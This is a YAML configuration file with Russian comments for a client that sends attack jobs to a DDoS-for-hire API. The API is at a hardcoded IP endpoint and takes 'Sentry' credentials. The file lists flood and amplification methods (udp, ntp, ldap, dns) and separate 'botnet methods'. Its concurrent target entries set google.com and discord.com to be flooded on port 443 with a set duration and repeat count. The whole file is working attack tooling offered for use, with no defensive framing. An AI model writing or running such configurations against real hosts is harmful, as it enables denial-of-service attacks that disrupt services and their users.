# методы нахуй
#
# 🧪 нормальные меоды –
#    flood
#    query
#    hypernix
#    bypass
#    crypto
#    vulcan
#    tcp
#    udp
#    ack
#    dns
#    ntp
#    ldap
#    sadp
#    socket
#    ssh
#    ovh-tcp
#
#
# 👁 Ботнет методы –
#    gudp
#    pudp
#    ovhraw
#    nforaw
#    handshake
#    tcpsocket
#    tcpbypass

settings:                                   # нужно что бы ну как бы апи да
  api:
    url: "http://45.141.202.144/api/attack" # лучше не трогать, мб для будущего
    username: ""                            # юзернейм от Sentry
    password: ""                            # пароль типо как ключ да от Sentry
    loop: 2                                 # сколько раз повторять атаку, если бесконечно ставь -1

concurrents:                                # сами таргеты, максимум 4!!!
  - url: "https://google.com"               # ну таргет да
    port: 443                               # порт таргета
    method: "flood"                         # метод, выше есть методы
    time: 3                                 # максимально 1500 сек!!

  - url: "https://discord.com"
    port: 443
    method: "flood"
    time: 3

  - url: "https://discord.com"
    port: 443
    method: "flood"
    time: 3

  - url: "https://discord.com"
    port: 443
    method: "flood"
    time: 3